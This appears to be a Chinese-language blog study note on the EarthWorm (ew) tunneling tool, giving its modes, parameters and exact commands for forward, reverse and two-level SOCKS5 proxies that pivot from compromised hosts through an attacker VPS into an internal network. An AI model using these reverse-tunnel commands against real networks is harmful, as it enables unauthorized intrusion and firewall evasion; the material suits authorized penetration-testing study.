8月24日笔记

ew的使用

EW(EarthWorm)是一套基于C语言开发的轻量级且功能强大的网络穿透工具,它支持Socks5代理、端口转发及端口映射等功能,能够在复杂的网络环境中实现高效稳定的网络穿透。这款全平台适用的工具(包括Windows、Linux和Mac系统)可以通过正向、反向或多级级联的方式建立网络隧道,直达目标网络位置,利用其特有的技术突破网络限制,有效绕过防火墙的阻隔。

介绍:EarthWorm (rootkiter.com)

下载地址: https://github.com/idlefire/ew

ew 有六种模式,分别是:

  • ssocksd:ssocksd 是用于普通网络环境下的正向连接
  • rcsocks:用于反向链接
  • rssocks:用于反向链接
  • lcx_slave:用于复杂网络环境的多级连接
  • lcx_listen:用于复杂网络环境的多级连接
  • lcx_tran:用于复杂网络环境的多级连接

常见参数:

  • -s 指定模式
  • -l 指定要监听的端口
  • -d 指定要反弹到的机器ip
  • -e 指定要反弹到的机器端口
  • -f 指定要主动连接的机器ip
  • -g 指定要主动连接的机器端口
  • -t 指定超时时长,默认为1000

一级代理

正向代理

通过正向代理访问边缘服务器所在的内网。

当目标机器有一个公网 ip 时,可以使用以下命令建立一个 socks5 的代理,监听1080 端口的流量。

复制代码
./ew_for_linux64 -s ssocksd -l 1080

测试一下是否成功代理。

成功正向代理。

反向代理

现在有这么一个场景,我们获得了一个位于内网的通过 NAT 方式对外提供服务的主机的权限,现在我们需要对其所在的内网继续进行渗透。于是,我们就需要通过ew 建立一个 socks5 隧道代理,让我们的主机可以通过隧道访问其内网

首先在 VPS 上开启如下监听,将 1080 端口监听的流量都转发到本地的 6666端口

复制代码
./ew_for_linux64 -s rcsocks -l 1080 -e 8888

成功执行。

接在在边缘服务器上执行以下命令来把本地的全部流量转发到目标主机VPS(192.168.5.168) 的 6666 端口。

复制代码
ew_for_Win.exe -s rssocks -d 192.168.5.168 -e 8888

成功连接。

成功反向代理。

二级代理

场景:内网主机 A 能出网,内网主机 B 不能出网,但是内网主机B 可以访问靶标。内网主机 A 不能访问到靶标,但是能通内网主机 B。我们现在已经拿到了内网主机 A 和内网主机 B 的权限。

攻击机--连接1080端口--->VPS(192.168.5.168)(静态IP)---->服务器A(192.168.52.128/192.168.5.143)------>服务器B(192.168.5.128)

首先在 VPS 上开启如下监听,将 1080 端口监听的流量都转发到本地的 8888端口。

复制代码
./ew_for_linux64 -s lcx_listen -l 1080 -e 8888

然后在服务器 B 上执行如下命令,监听本地的 9999 端口

复制代码
ew_for_Win.exe -s ssocksd -l 9999

最后再服务器 A 上执行如下命令,将 VPS 的 8888 端口和服务器 B 的 9999 端口连接起来

复制代码
ew_for_Win.exe -s lcx_slave -d 192.168.5.168 -e 8888 -f 192.168.5.128 -g 9999

以上命令都执行完之后,设置 socks5 代理为 VPS 39.99.251.19 的 1080 端口,

即可成功访问web 系统。

kali中设置socks5代理。


相关推荐
好心的小明42 分钟前
【深度之眼机器学习笔记】04-01-决策树简介、熵,04-02-条件熵及计算举例,04-03-信息增益、ID3算法
笔记·算法·决策树
zhaoyang03012 小时前
vue3笔记(2)自用
前端·javascript·笔记
蒙塔基的钢蛋儿3 小时前
将nuttx构建脚本的文件夹复制修改为符号链接
笔记
墨染枫5 小时前
pytorch学习笔记-使用DataLoader加载固有Datasets(CIFAR10),使用tensorboard进行可视化
pytorch·笔记·学习
jarreyer5 小时前
【图像分割】记录1:unet, yolov8_seg
人工智能·笔记·计算机视觉
ljt27249606616 小时前
Compose笔记(三十八)--CompositionLocal
笔记·android jetpack
月阳羊13 小时前
【硬件-笔试面试题】硬件/电子工程师,笔试面试题-26,(知识点:硬件电路的调试方法:信号追踪,替换,分段调试)
笔记·嵌入式硬件·面试·职场和发展
Star在努力14 小时前
14-C语言:第14天笔记
c语言·笔记·算法
霜绛16 小时前
机器学习笔记(三)——决策树、随机森林
人工智能·笔记·学习·决策树·随机森林·机器学习